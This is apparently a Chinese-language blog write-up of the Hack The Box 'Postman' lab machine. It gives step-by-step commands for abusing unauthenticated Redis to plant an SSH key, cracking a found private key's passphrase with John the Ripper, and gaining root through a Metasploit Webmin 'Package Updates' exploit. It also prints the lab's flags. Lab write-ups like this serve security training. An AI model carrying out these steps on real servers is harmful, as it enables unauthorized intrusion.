0x00 前言

懒了,原本要保证每个月至少输出一篇blog,翻了翻做的笔记,不是不能拿出来讲的就是片段化的知识点,要是往外发的话,还要加工下,直线刷HTB的时候写了点writeup,稍微整理下发出来了。

0x01 渗透思路

整理一下撸这个靶机的思路:

1. 6379 redis未授权访问漏洞写公钥
2. 翻目录找到Matt用户的私钥,john爆破出密码,redis用户su过去到Matt用户,拿到用户权限
3. 利用Webmin的洞,配合Matt的登录凭证拿到root权限,over

0x02 Hack The Box Postman Writeup

IP:10.10.10.160

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
root@kali:/home/ec2-user/hack_the_box# nmap -p- -sV -T4 -A -Pn -oX Hack_The_Box_Postman.xml 10.10.10.160
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 06:17 UTC
Nmap scan report for ip-10-10-10-160.ap-northeast-1.compute.internal (10.10.10.160)
Host is up (0.29s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open ssl/http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
| ssl-cert: Subject: commonName=*/organizationName=Webmin Webserver on Postman
| Not valid before: 2019-08-25T16:26:22
|_Not valid after: 2024-08-23T16:26:22
|_ssl-date: TLS randomness does not represent time
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/11%OT=22%CT=1%CU=30655%PV=Y%DS=2%DC=T%G=Y%TM=5E196A8
OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=D)SEQ
OS:(SP=103%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=
OS:7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 270.87 ms ip-10-10-14-1.ap-northeast-1.compute.internal (10.10.14.1)
2 428.63 ms ip-10-10-10-160.ap-northeast-1.compute.internal (10.10.10.160)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 557.25 seconds
root@kali:/home/ec2-user/hack_the_box#

看到开了6379端口,准备试试有没有redis未授权访问的问题。
可以使用如下命令安装redis-cli [1]:

1
sudo apt-get install redis-tools -y

访问redis服务[2]:

1
redis-cli -h 10.10.10.160 -p 6379

既然已经可以登录到这个redis服务了,那现在我们尝试使用我之前写过的一篇文章getshell试试[3]:

悲催,没权限。
10000端口看着也是一个Web服务,去看看有啥发现没:

本地hosts文件修改下就可以正常访问这个站点了:

看到这个Web服务的Banner还挺显眼的,就去Google搜了一下,是个有故事的服务hhh,之前就已经被攻击者以预埋漏洞的方式留了后门,典型的供应链攻击啊。那么我们的这台靶机是否适用的,需要点时间研究看看。
先来确认一下版本:

Server: MiniServ/1.910
找到了一个利用代码[7],这个利用代码适用于MSF,现在需要看看MSF是否内置了这个利用代码,或者我们把这个利用代码导入到MSF中。

撸了半天没撸下来,看下下exploit的描述“Any user authorized to the “Package Updates” module can execute arbitrary commands with root privileges.”还是得先拿到用户才能利用这个洞,也就是说我要先有个账号,这样看得话,这个洞就是用来提权用的,然后很不幸的是我又看到了writeup,看了下思路,还是在redis层面先搞一个账号,然后再利用Webmin进行提权。从nmap的扫描结果我们可以知道redis的版本是4.0.9。渗透这个东西,还是自己动手撸一下,不然思路就废了。
用linux/redis/redis_unauth_exec模块撸了半天没撸下来,就接着看writeup了。
思路还是通过redis执行命令写公钥登录服务器,之前还以为是溢出啥的高端洞呢。来试试:
ssh-keygen -t rsa -b 4096 -C “[email protected]“ # 使用该命令生成密钥对,用于登录redis用
/root/.ssh/postman # 配置私钥的路径

redis-cli -h 10.10.10.160 # 登到这台redis上头去

设置需要写入的key:
set s-key “\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDInuzivP7rs0cryLZm+zF4nShbBdKOmDKDbdIWiRyYgrzhDBRSFzOWOUCz6IyPEtPIpYOlQ+GGvsbLlmEe5iOdBBloXADRZZKbcDEViQPYrrdrxAH+mQE8a0jfVAMr+DdmJMlGEHj4M4YUkHmi5E2ZgT9FikutLmhnlbZPcbAztAXcmQdGKp0zjEYXJKnblTKTj6wcVO4euV7fSKgwil6IgOuZtXR5L/GNy0Sm0qH4IBGeJBLV0XQCCfO68mOs0ARlCCkKF4+CLeKLz4IapXGlaZgp8snTodWtlvFrZwKKLeeJ5Fu7kyY+VOfAsme0yJZ4sOJ3QDpSrQujdE5IwtFgXQlhgu4Z9N8umovlM8O7YISjk6K+EjexjrzregnePIRg9y0TEVlQVjxZzdnigY0z+4GGhhRIQjmXLFYCUzYRyawLoJE5cfwGN5xOfamV0EoOPEHIfEx9b3u2lrb82p6KkSMSetFck1K9dOWDQrZHMOYJ1Z4Uk+2q62hXMpj3vdctXMQlmbpbDPWGdTjGVz4xafuVj2WIUu65WeGiyfWvo2xxr1Gk4X9LIfa0ZTpkiON18mfpplqARawqe6AslDvoO1+mqfqXgZxbWcAD6h/rktka+VQxzAlOT2lS2Y1/U/5Z1rxGNte7npZuYWWJJAc1YbtF9GQIXleJWvIuXOlS8Q== [email protected]\n\n”

set dir /var/lib/redis/.ssh 设置目录(redis的默认安装目录)
config set dbfilename authorized_keys
Save
quit
ssh [email protected] -i ~/.ssh/postman # 登录目标机器
可以看到,成功登上去了:

这里应该反思一些,上面报权限不足的时候其实并不是set dir这个命令没权限,而是对应的目录没权限,其实比较好理解,我肯定不能已root权限跑redis,所以应该找到redis的默认安装目录,上面的就是默认的安装目录。
信息收集一波,看看其他的黑客都搞啥事情了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
redis@Postman:~$ cat .bash_history
exit
su Matt
pwd
nano scan.py
python scan.py
nano scan.py
clear
nano scan.py
clear
python scan.py
exit
exit
cat /etc/ssh/sshd_config
su Matt
clear
cd /var/lib/redis
su Matt
exit
cat id_rsa.bak
ls -la
exit
cat id_rsa.bak
exit
ls -la
crontab -l
systemctl enable redis-server
redis-server
ifconfig
netstat -a
netstat -a
netstat -a
netstat -a
netstat -a > txt
exit
crontab -l
cd ~/
ls
nano 6379
exit
redis@Postman:~$

使用这个脚本可以做进一步的信息收集:https://raw.githubusercontent.com/WazeHell/PE-Linux/master/PE.sh

找到Matt这个用户的私钥:
redis@Postman:/opt$ ls
id_rsa.bak
redis@Postman:/opt$ cat id_rsa.bak
—–BEGIN RSA PRIVATE KEY—–
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
—–END RSA PRIVATE KEY—–
redis@Postman:/opt$
常规思路就是既然我在这个目录下翻到了一个私钥,就要去试试能不能使用Matt这个用户登录至这台机器上:

可以看到这个私钥还有一个passphrase key我们是不知道的,试了几个都不对。使用john跑密码看看:

1
2
3
4
cd /usr/share/john
./ssh2john.py ~/.ssh/id_res.bak > Matt.hash
gzip -d rockyou.txt.gz
/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt Matt.hash

很快密码就跑出来了,美滋滋:

拿到跑出来的passphrase密码继续ssh上去,结果会在瞬间掉线:

登不上去的原因也比较简单,我们通过redis那个用户登录上去翻到SSH的配置文件(/etc/ssh/sshd_config)可以知道这个用户被禁止通过SSH登录了。

直接在redis用户上使用密码su过去:

接下来拿到了这个user.txt

1
2
3
4
5
Matt@Postman:/var/lib/redis$ cd ~
Matt@Postman:~$ ls
user.txt
Matt@Postman:~$ cat user.txt
517ad0ec2458ca97af8d93aac08a2f3c

sudo -s提权提不上去,sudoers file没有包含Matt用户的原因:

既然现在已经有了一个系统用户的登录凭证,现在这会就可以在此配合前面那个Webmin的洞了:

1
2
3
4
5
6
7
use linux/http/webmin_packageup_rce
options

id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
a257741c5bed8be7778c6ed95686ddce

拿到flag之后去HTB提交就可以了:

0x03 参考链接

[1] Linux - Install redis-cli only, https://stackoverflow.com/questions/21795340/linux-install-redis-cli-only
[2] Redis 命令, https://www.runoob.com/redis/redis-commands.html
[3] redis 在渗透中 getshell 方法总结, https://zhuanlan.zhihu.com/p/36529010
[4] Webmin 1.890 Exploit - What Happened?, http://www.webmin.com/exploit.html
[5] metasploit渗透攻击之旅, https://www.cnblogs.com/zqjt/p/5431023.html
[6] metasploit-framework/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md, https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/unix/webapp/webmin_upload_exec.md
[7] Webmin 1.910 - ‘Package Updates’ Remote Command Execution (Metasploit), https://www.exploit-db.com/exploits/46984
[8] HackTheBox: Postman - Writeup, https://www.soeren.codes/2019/12/24/postbox-writeup/